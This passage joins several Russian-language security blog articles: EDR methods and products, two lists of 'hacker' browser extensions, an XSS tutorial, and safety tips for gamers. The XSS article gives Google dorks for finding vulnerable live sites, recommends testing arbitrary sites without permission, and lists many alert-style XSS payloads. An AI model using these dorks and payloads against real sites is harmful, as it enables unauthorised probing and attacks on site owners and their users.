Обнаружение на основе подписей. Этот традиционный метод сравнивает подписи файлов с базой данных известных вредоносных программ. Если файл соответствует известной подписи, он помечается как вредоносный.
Эвристический анализ. Этот метод проверяет поведение и характеристики файла для выявления подозрительных закономерностей, которые могут указывать на вредоносное ПО, даже если сам файл неизвестен.
Поведенческий анализ. Благодаря поведенческому анализу EDR активно отслеживает запущенные процессы и приложения, быстро обнаруживая аномалии, которые могут сигнализировать о вредоносных действиях. Этот метод способствует превентивному выявлению потенциальных угроз.
Машинное обучение. Используя алгоритмы машинного обучения, EDR эффективно анализирует обширные наборы данных, быстро выявляя сложные закономерности, указывающие на потенциальные угрозы. Такой подход значительно расширяет возможности обнаружения угроз.
Анализ угроз. Благодаря интеграции с потоками данных об угрозах EDR всегда находится в курсе новейших ландшафтов угроз, уязвимостей и развивающихся методов атак. Эта интеграция позволяет системе активно предвидеть и противодействовать возникающим угрозам.
Лучшие инструменты EDR
Вот некоторые из передовых инструментов EDR на рынке:

Palo Alto Networks Cortex XDR
Palo Alto Networks Cortex XDR предлагает комплексное решение EDR, обеспечивающее не только видимость конечных точек, но и надежное обнаружение угроз и возможности быстрого реагирования на атаки. Cortex XDR, известный своими расширенными функциями машинного обучения, легко интегрируется с различными устройствами, повышая их общую безопасность.

SentinelOne Singularity
Singularity — это облачное решение EDR, известное своей простотой использования и способностью масштабироваться до крупных предприятий. Он предлагает множество функций, включая обнаружение конечных точек, поиск угроз и автоматическое ликвидирование.

CrowdStrike Falcon Insight XDR
Falcon Insight XDR — еще одно облачное решение EDR, известное своими мощными возможностями обнаружения и использованием машинного обучения для выявления угроз. Falcon XDR решает самые серьезные проблемы обнаружения и реагирования на инциденты, обеспечивая: видимость, поиск и реагирование с неслыханной скоростью и масштабом.

Cynet 360 AutoXDR
Cynet 360 AutoXDR - это усовершенствованная платформа для обнаружения и реагирования на угрозы, которая точно обнаруживает сложные кибератаки, такие как Advanced Persistent Threats (APT), продвинутые вредоносные программы, трояны, вымогатели и атаки "нулевого дня".

Trend Micro XDR
XDR — это облачное решение EDR, которое собирает и коррелирует данные, охватывая несколько уровней безопасности — электронную почту, конечные устройства, серверы, сети и облачные нагрузки. Такой анализ данных позволяет быстрее обнаруживать угрозы и сокращать время расследования и реагирования.

Выбор лучшего инструмента для вас будет зависеть от ваших конкретных потребностей и требований.

Заключение
Перед лицом быстро меняющихся угроз EDR выступает в качестве важного инструмента для пользователей и организаций, стремящихся защитить свои данные и системы. Использование EDR имеет решающее преимущество в борьбе с киберугрозами.

Топ 7 хакерских расширений для вашего браузера

Топ 7 хакерских расширений для вашего браузера

Вступить в наш чат
В интернете, где на каждом шагу скрываются угрозы, важно уметь защищать свое личное киберпространство. Расширения браузера предлагают уникальный уровень защиты как для хакеров, так и для обычных пользователей, которые беспокоятся о безопасности своих данных. Эти расширения имеют множество функций: от выявления уязвимостей до защиты паролей. И сегодня мы поделимся с вами 7 лучшими расширениями браузера, о которых должен знать каждый.





1. Foxyproxy Standard





Представьте себе сёрфинг в Интернете без ограничений, легкий обход геоблокировок и доступ к контенту со всего мира. С Foxyproxy Standard это становится реальностью. Расширение позволяет легко переключать IP-адреса, а обширная сеть прокси-серверов гарантирует, что у вас всегда будет надежное соединение под рукой с повышенной безопасностью во время просмотра.

2. Multi-Account Containers




Multi-Account Containers - это расширение, разрабатанное Mozilla и позволяющее разделить просмотр между различными помеченными цветом вкладками для защиты вашей конфиденциальности. Используя эти контейнеры, вы можете категоризировать просмотр на основе целей и создавать вкладки для Работы, Банкинга, Покупок и Личного. Контейнер с несколькими учетными записями выступает в роли вашего личного органайзера, изолируя каждую учетную запись в отдельные категории, чтобы файлы cookie и учетные данные для входа не мешали друг другу. Это расширение не только упрощает управление учетной записью, но и защищает вашу конфиденциальность, предотвращая межсайтовое отслеживание и несанкционированный доступ.

3. Pwnfox




Для тех, кто хочет попробовать себя в роли хакера или эксперта по безопасности, выявляя уязвимости, Pwnfox станет бесценным помощником. Это расширение легко интегрируется с веб-браузерами, сканируя сайты на наличие пробелов в безопасности, а затем предоставляет подробную инструкцию о том, как их можно использовать.

4. HackBar V2 (Firefox) and HackBar (Chrome)




Представьте себе, что у вас под рукой есть набор команд, инструментов и фрагментов кода, готовых упростить ваши задачи по взлому. С HackBar это становится возможным. Он автоматизирует повторяющиеся задачи, упрощает сложные операции и повышает общую производительность.

5. Hack-Tools




Hack-Tools — это сокровищница для хакеров и специалистов по кибербезопасности, предлагающая полный набор инструментов, адаптированных к различным аспектам хакинга. От полезных нагрузок XSS до инструментов кодирования данных и генератора хэшей. Hack-Tools имеет универсальный магазин для широкого спектра потребностей в области кибербезопасности, который станет незаменимым помощником в вашем наборе инструментов.

6. Shodan




Раскрыть тайный мир интернет устройств теперь стало возможным благодаря Shodan, известной поисковой системе, специально разработанной для этой цели. Это расширение легко интегрирует возможности Shodan в ваш веб-браузер, позволяя вам искать и анализировать устройства на основе их IР адресов, портов и другой соответствующей информации. Shodan — бесценный инструмент для исследователей безопасности и хакеров.

7. uBlock Origin




В интернете на сегодняшний день навязчивая реклама, всплывающие окна и вредоносные скрипты стали нежелательной нормой. Они тормозят вашу работу и ставят под угрозу вашу конфиденциальность. uBlock Origin поможет вам в этом деле, заблокируя все возможные помехи на ваших веб-страницах благодаря обширным фильтрам и настройкам.

Заключение
Сфера кибербезопасности постоянно развивается, поэтому необходимо вооружиться надежными инструментами, чтобы противостоять угрозам и защищать свои данные. Сегодня мы рассказали вам о 7 расширениях браузера, тщательно отобрав самые лучшие с учетом их функциональности и значимости. Но на этом наша подборка не заканчивается, в следующей части мы поговорим о других расширениях для улучшения ваших навыков, оптимизации рабочего процесса и повышения общей эффективности в цифровом мире. Надеемся, эти расширения помогут вам в работе, защитив ваше цифровое пространство.

Хакерские расширения, которые прокачают твой браузер

Хакерские расширения, которые прокачают твой браузер

Знали ли вы, что выполнять аудит, взлом и другие задачи можно просто из браузера, если его подготовить должным образом? Дело в том, что браузеры - это уже не просто средства просмотра веб-страниц, а универсальные платформы для взаимодействия с любыми удаленными сервисами. Они могут заменить собой целый набор утилит, совершенно не требуя взаимодействия с Kali Linux. В этой статье мы рассмотрим хакерские расширения, которые прокачают ваш браузер.

Ранее мы уже начали освещать данную тему и поделились с вами подборкой лучших расширений для браузера. Нажмите сюда, чтобы прочитать статью. Однако, это были далеко не все утилиты, и сегодня мы продолжаем делиться другими расширениями для улучшения вашего браузера и оптимизации рабочего процесса.

Wappalyzer:

Вы когда-нибудь задумывались о технологиях, которые обеспечивают работу сайтов, которые вы посещаете? Wappalyzer — это расширение браузера, которое раскрывает технологии, используемые на веб-сайтах. Оно определяет системы управления контентом, платформы eCommerce, веб-серверы, фреймворки JavaScript инструменты аналитики и многое другое. Одним щелчком мыши Wappalyzer показывает изнанку работы этих сайтов, предлагая ценную информацию специалистам по кибербезопасности и всем, кому интересно узнать о механизмах, лежащих в основе сайтов. Полученная информация поможет в поиске уязвимостей веб-приложения.

Cookie Editor

Ваша конфиденциальность в Интернете имеет первостепенное значение, и файлы cookie, хранящиеся на веб-сайтах, могут сыграть злую шутку с вашей безопасностью. Но существует «Cookie Editor» или в переводе с английского «Редактор Куки», который дает вам возможность редактировать и удалять файлы cookie по своему усмотрению. С помощью этого расширения вы можете выборочно отключать файлы cookie, чтобы защитить свою конфиденциальность и предотвратить нежелательное отслеживание вашей активности.

DotGit

DotGit — расширение для проверки наличия на сайте папок git/.svn/.hg. Тулза поможет найти незащищенные файлы .env, security.txt и многое другое. Просмотр .git / config одним кликом мышки. DotGit упрощает этот процесс, обеспечивая плавную интеграцию функций Git в ваш веб-браузер. DotGit устраняет необходимость переключения между приложениями и оптимизирует рабочий процесс.

Note Anywhere

Ведение журналов и записей при проведении OSINT разведок крайне необходимо, поэтому представляем вам «Note Anywhere» или «Заметки где угодно». Это расширение превращает ваш браузер в универсальный инструмент для создания заметок, позволяя записывать важную информацию сию же минуту, при проведении разведок. Note Anywhere оптимизирует работу, гарантируя что ваши мысли и идеи всегда будут зафиксированы «на бумаге».

Hunter – расширение для поиска электронной почты

Hunter - еще одно расширение в помощь OSINT разведчикам. Это расширение автоматически выполняет поиск электронной почты на сайтах, связанных с доменом, который вы сейчас посещаете. Благодаря своей обширной базе данных и мощным возможностям поиска, Hunter экономит ваше время и усилия при проведении OSINT.

Retire.js:

JavaScript, вездесущий язык, на котором работает бесчисленное количество веб-сайтов, также может создавать уязвимости безопасности, если его не реализовать должным образом. Retire.js решает эту проблему, выявляя и отключая устаревшие и потенциально небезопасные библиотеки JavaScript на посещаемых вами веб-сайтах. Это расширение существенно повышает безопасность вашего просмотра веб-страниц.

Blackbox

Извлечение определенных фрагментов текста с веб-сайтов для дальнейшего анализа или исследования — обычная задача хакеров и специалистов по кибербезопасности. «Blackbox» или «Черный ящик» упрощает этот процесс, позволяя выбирать и копировать текст прямо с веб-страниц, независимо от их форматирования или ограничений.

OWASP Pen Testing Kit

Расширение браузера Pen Testing Kit упрощает задачи по обеспечению безопасности приложений, предлагая встроенные в браузер сканер DAST и SCA для обнаружения ряда уязвимостей, таких как SQL-инъекции, XSS и других угроз. Благодаря прокси-серверу для анализа трафика он обеспечивает безопасность, выявляя риски на ранней стадии посредством интеграции Selenium.

Заключение
Сфера кибербезопасности постоянно развивается, поэтому необходимо вооружиться надежными инструментами, чтобы противостоять угрозам и защищать свои данные. Надеемся, эти расширения помогут вам в работе, защитив ваше цифровое пространство, а также оптимизируют процесс хакинга и повысят общую эффективность в цифровом мире. На этом все. Удачи!

XSS атакует! Как найти XSS-уязвимости на сайте





XSS (Cross Site Scripting, межсайтовый скриптинг) – один из видов уязвимостей компьютерной системы, с помощью которой вредоносные скрипты внедряются в контент веб-сайта. Специфика хакерских атак, с использованием XSS, заключается в том, что вместо атаки, нацеленной на сервер, мошенники используют сервер в качестве средства атаки на клиента. Это позволяет хакеру использовать доверенный для пользователя сайт в своих целях, от кражи данных до показа рекламы. Но как на самом деле обнаружить XXS-уязвимости и защититься от них, мы сегодня и расскажем.



Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Что такое XSS-уязвимости
XXS-уязвимость — это не просто сбой в коде; это открытое приглашение для хакеров, брешь в онлайн-безопасности. Эта уязвимость позволяет злоумышленникам внедрять сценарии в веб-страницы, просматриваемые другими пользователями, открывая путь для широкого спектра кибератак — от кражи конфиденциальной информации до перехвата пользовательских сеансов.

Атаки с использованием межсайтового скриптинга (XSS) — это способ атаки, при котором вредоносные сценарии внедряются на безопасные и надежные веб-сайты. XSS-атаки происходят, когда злоумышленник использует веб-приложение для отправки вредоносного кода пользователю, обычно в виде сценария на стороне браузера. В то время, как браузер пользователя не имеет возможности узнать, что скрипту нельзя доверять, выполняет его. После этого хакер может получить доступ к любым файлам cookie или другой конфиденциальной информации, хранящейся в браузере и используемой на этом сайте. Эти сценарии могут даже перезаписать содержимое HTML-страницы.

Типы XSS
Можно выделить два основных вида скриптинга:

1) Постоянный или хранимый XSS. С одной стороны, этот вид скриптинга встречается реже, поскольку требует от взломщика бОльшего количества навыков. С другой стороны – он гораздо опаснее, поскольку злоумышленник получает возможность внедрить вредоносный код на сервер сайта, и скрипт будет активироваться при каждом запросе к странице.

2) Непостоянный или отраженный XSS. Он встречается гораздо чаще и менее «требователен» к навыкам атакующего. Однако, для реализации этого вида скриптинга пользователь должен посетить специально сформированную ссылку, которую злоумышленнику нужно распространить.

Также, ряд специалистов выделяет в отдельную группу XSS-инъекции в DOM-модели, поскольку они не отражаются в HTML и детектировать их сложнее, но реализуется эта уязвимость на стороне клиента, следовательно – практически неприменима для массового распространения.

Как найти XSS на сайте
Но как обнаружить эту микроскопическую щель в цифровой броне? Это похоже на поиск иголки в стоге сена, но при наличии правильных инструментов и знаний это вполне осуществимо. Чтобы найти XSS на действующем веб-сайте, прежде всего, нам нужно найти веб-сайт, на котором присутствуют XSS-уязвимости. Для этого существует несколько инструментов тестирования безопасности веб-приложений, таких как OWASP ZAP, Burp Suite, Acunetix, XSStrike, BeEF и другие.

Но в этой статье мы будем искать их вручную с помощью нескольких интересных Google Dorks, которые помогут нам найти уязвимые параметры на действующих веб-сайтах:

inurl:index.php?id=
inurlroduct.php?id=
inurl:category.php?id=
inurl:article.php?id=
inurl:gallery.php?id=
inurlage.php?id=
inurl:show.php?id=
inurl:detail.php?id=
inurl:view.php?id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:topic.php?ID=
inurl:forum.php?topic=
inurl:viewforum.php?id=
inurlrofile.php?id=
inurl:showthread.php?t=
inurl:member.php?action=profile&id=
inurlroductlist.php?id=
inurl:shop_category.php?id=
inurl:catalog.php?cat=
Для начала мы выберем поиск XSS

inurl:index.php?id=




«Что теперь?», спросите вы. Советуем просто тестировать каждый сайт, так вы можете обнаружить нечто, действительно, стоящее.

Мы так и сделали. Действовав вслепую, мы нашли несколько сайтов, уязвимых для XSS.




Какой скрипт мы использовали?
<script>alert(123);</script>

<ScRipT>alert("XSS");</ScRipT>

<script>alert(123)</script>

<script>alert("hellox worldss");</script>

<script>alert('XSS')</script>

<script>alert('XSS');</script>

<script>alert('XSS')</script>

'><script>alert('XSS')</script>

<script>alert(/XSS/)</script>

<script>alert(/XSS/)</script>

</script><script>alert(1)</script>

'; alert(1);

')alert(1);//

<ScRiPt>alert(1)</sCriPt>

<IMG SRC=jAVasCrIPt:alert('XSS')>

<IMG SRC='javascript:alert('XSS');'>

<IMG SRC=javascript:alert(&quot;XSS&quot>

<IMG SRC=javascript:alert('XSS')>

<img src=xss onerror=alert(1)>


Есть более сложные, например:

<svg/onload=alert(/XSS/)>

<div data-content="<svg/onload=alert('XSS')">Hover over me</div>

<input type="text" value="<script>alert('XSS')</script>">

<svg/onload=alert('XSS')>

<a href="javascript:alert('XSS')">Click Me</a>

<style>.xss{background-image:url("javascript:alert('XSS')");}</style><div class="xss"></div>

<div id="test" onmouseover="alert('XSS')"></div>

<script>document.getElementById('test').setAttribute('onmouseover', 'alert(\'XSS\')')</script>

<script>

var name = "<img src=x onerror=alert('XSS')>";

document.write("Hello, " + name);

</script>

<img src="javascript:alert('XSS')">

<button onclick="alert('XSS')">Click Me</button>

Есть еще несколько, которые вы можете найти здесь.

Как защититься от XSS-атак
Атаки с использованием межсайтового скриптинга (XSS) внедряют вредоносный код на сайты и перехватывают пользовательские сеансы, похищая данные или распространяя вредоносное ПО. Но вы можете усилить свою защиту следующим образом:

Проверка ввода. Прежде чем обрабатывать любые данные, полученные от пользователей (формы, URL-адреса, файлы cookie), тщательно проверьте их на соответствие ожидаемым форматам и длинам. Очистите входные данные, удалив специальные символы и закодировав потенциально опасные.
Используйте белый список. Вместо внесения в черный список нежелательных символов, используйте белый список допустимых символов. Это более строгий подход, но он снижает риск пропуска вредоносных шаблонов.
Кодировка вывода. Кодируйте весь вывод: при создании HTML, JavaScript или другого кода, который будет отображаться пользователям, убедитесь, что он правильно закодирован, чтобы предотвратить интерпретацию вредоносных сценариев. Используйте библиотеки или встроенные функции для безопасного кодирования.
Используйте политику безопасности контента (CSP). CSP определяет ресурсы (скрипты, стили), которые веб-сайт может загружать. Он ограничивает несанкционированное выполнение сценариев и может предотвратить XSS-атаки, даже если другие средства защиты не сработали.
Профилактика. Регулярно обновляйте ПО, веб-приложения, платформы и библиотеки для устранения уязвимостей, используемых злоумышленниками.
Используйте методы безопасного кодирования. Разработчики должны быть обучены методам безопасного кодирования, чтобы избежать распространенных уязвимостей, которые могут привести к XSS-атакам.
Ограничьте права пользователя. Предоставьте пользователям минимальный уровень доступа, необходимый для их задач. Это снижает потенциальное воздействие в случае успеха XSS-атаки.
Внедрите заголовки безопасности HTTP. Используйте заголовки безопасности, такие как X-XSS-Protection и X-Content-Type-Options, для настройки поведения браузера и предотвращения атак XSS.
Дополнительные меры безопасности
Сканирование уязвимостей. Регулярно сканируйте свой сайт и веб-приложения на наличие уязвимостей, которыми могут привести к XSS-атакам.
Брандмауэры веб-приложений (WAF). Рассмотрите возможность внедрения WAF для фильтрации и блокировки вредоносного трафика до того, как он достигнет вашего веб-приложения.
Совершенствуйте свои знания в области кибербезопастности. Узнавайте больше о XSS и других атаках вместе с нашими статьями. Будьте осторожны при нажатии на подозрительные ссылки или вводе конфиденциальной информации на сайтах.
Заключение
Помните, защита от XSS — это непрерывный процесс, а не единоразовое исправление проблемы. Приняв все меры безопасности, описанные выше, и сохраняя бдительность,

10 правил безопасности для геймеров: как защититься от взлома

10 правил безопасности для геймеров: как защититься от взлома

В захватывающем мире онлайн-игр, где каждый клик — это шаг к победе, а каждая секунда имеет значение, вы сражаетесь не просто с виртуальными противниками, вы боретесь с реальными угрозами, которые могут подорвать вашу конфиденциальность. Во время всей игры вы можете встретить неожиданных противников от коварных хакеров до хитрых фишинговых мошенников. Но не стоит беспокоиться, ведь сегодня мы расскажем, как бороться с 10 главными угрозами, преследующими игровую вселенную. Итак, хватайте свое игровое снаряжение, прокачивайте свои навыки кибербезопасности и давайте отправимся в приключение!




10 угроз для геймеров
Фишинг
Фишинговые атаки являются самой распространенной угрозой в игровом сообществе. Киберпреступники создают поддельные страницы входа или рассылают электронные письма, чтобы обманом заставить игроков раскрыть свои учетные данные. Чтобы не стать жертвой фишинга, всегда дважды проверяйте URL-адрес и адрес отправителя электронной почты. Используйте браузер со встроенной защитой от фишинга.

Слабые пароли
Использовать слабые пароли — это все равно, что оставить входную дверь настежь открытой. Создавайте надежные и уникальные пароли для своих игровых учетных записей и регулярно меняйте их. А для дополнительного уровня безопасности включите двухфакторную аутентификацию (2FA).

Взлом аккаунта
Взлом аккаунта может привести к разрушительной потере внутриигровых предметов и прогресса. Чтобы этого не произошло, никогда не делитесь своими данными для входа, даже с друзьями. Будьте осторожны с подозрительными попытками входа в систему и сообщайте о любых необычных действиях в службу поддержки игры.

Доксинг
Доксинг предполагает раскрытие личной информации игрока без его согласия, такой как его настоящее имя, адрес или номер телефона. Защитите свою личность, используя никнейм, и никогда не делитесь личной информацией в чатах или на форумах. Будьте осторожны при общении с незнакомцами.

Внутриигровое мошенничество
В сообществах онлайн-игр часто есть игроки, которые стремятся использовать других ради личной выгоды. Остерегайтесь внутриигрового мошенничества, например, такого как раздача поддельных предметов. Занимайтесь сделками только в рамках игры, а не за ее пределами на других площадках.

Вредоносное ПО и вирусы
Геймеры, скачивающие читы или хаки для игр, могут подвергнуть свой компьютер воздействию вредоносных программ и вирусов. Поэтому постоянно обновляйте антивирус и избегайте загрузки файлов с ненадежных сайтов.

Распределенные атаки типа «отказ в обслуживании» (DDoS)
DDoS-атаки нацелены на игровые серверы, что приводит к задержкам и отключению игроков. Используйте виртуальную частную сеть (VPN), чтобы скрыть свой IP-адрес и защититься от DDoS-атак. Кроме того, сообщайте администраторам игры о любых предполагаемых DDoS-инцидентах.

Социальная инженерия
Социальная инженерия предполагает манипулирование игроками с целью разглашения конфиденциальной информации. Будьте осторожны, принимая запросы на добавление в друзья от незнакомцев, и не делитесь личными данными или финансовой информацией с кем-либо в игре.

Сторонние торговые площадки
Покупка внутриигровых предметов или учетных записей на сторонних торговых площадках может привести к мошенничеству и бану учетной записи. Для покупок придерживайтесь официальной торговой площадки игры, всегда читайте отзывы пользователей и изучайте репутацию продавца.

Уязвимости голосового чата
Голосовой чат может иметь уязвимости, которыми могут воспользоваться злоумышленники. Регулярно обновляйте ПО голосового чата и используйте проверенные приложения с надежными мерами безопасности. Геймеры будьте осторожны, делясь конфиденциальной информацией во время разговоров.

Как оставаться в безопасности в онлайн-играх
Соблюдение мер безопасности во время игры крайне необходимо для защиты вашей личной информации и игровых учетных записей. Вот несколько важных советов, которые помогут геймерам оставаться в безопасности:

Используйте надежные и уникальные пароли. Создавайте сложные пароли для своих игровых учетных записей, состоящие из прописных и строчных букв, цифр и символов. Избегайте использования в паролях легко угадываемой информации, такой как ваше имя или дата рождения. Рассмотрите возможность использования надежного менеджера паролей для безопасного создания и хранения ваших паролей.
Включите двухфакторную аутентификацию (2FA). По возможности включите 2FA в своих игровых аккаунтах. Это добавляет дополнительный уровень безопасности, требуя второго этапа проверки, обычно через смс или приложение для аутентификации.
Будьте осторожны с фишингом. Будьте осторожны с электронными письмами, сообщениями или ссылками, которые запрашивают ваши учетные данные для входа. Подтвердите личность отправителя и проверьте URL-адреса на наличие ошибо. Никогда не переходите по подозрительным ссылкам, особенно в сообщениях чата от неизвестных игроков.
Защитите свои персональные данные. Не делитесь личной информацией с другими игроками. При создании используйте псевдоним вместо настоящего имени.
Постоянно обновляйте свое программное обеспечение. Регулярно обновляйте антивирус и следите за обновлениями игры, чтобы устранить потенциальные уязвимости безопасности. Включите автоматические обновления, чтобы всегда использовать новейшие и наиболее безопасные версии ПО.
Используйте надежные приложения голосового чата. Если вы используете голосовой чат во время игры, скачайте надежные и безопасные приложения. При этом, никогда не делитесь конфиденциальной информацией во время разговоров.
Остерегайтесь внутриигрового мошенничества. Будьте осторожны с внутриигровым мошенничеством, таким как раздача поддельных предметов. Занимайтесь транзакциями только внутри официальных систем игры.
Выбирайте проверенные игровые площадки. Если вы покупаете/продаете внутриигровые предметы или учетные записи, совершайте сделки в официальном игровом магазине или на сайтах с надежной репутацией. Также прочитайте отзывы пользователей и изучите рейтинг продавца.
Сообщайте о подозрительной активности. Если вы столкнулись с каким-либо подозрительным поведением, попытками взлома или с мошенничеством в игре, незамедлительно сообщите об этом в службу поддержки игры.
Установите настройки конфиденциальности. Настройте параметры конфиденциальности в игре, чтобы ограничить объем личной информации, которую видят другие пользователи.
Заключение
Во время игр ваша безопасность и конфиденциальность должны быть для вас главным приоритетом. Оставаясь в курсе различных существующих угроз и принимая превентивные меры для своей защиты, вы можете наслаждаться игрой, не беспокоясь о том, что станете жертвой мошенничества или других вредоносных действий. Не забывайте использовать надежные пароли, включать 2FA и быть осторожными при взаимодействии с другими игроками в сети. Приняв все вышеуказанные меры защиты,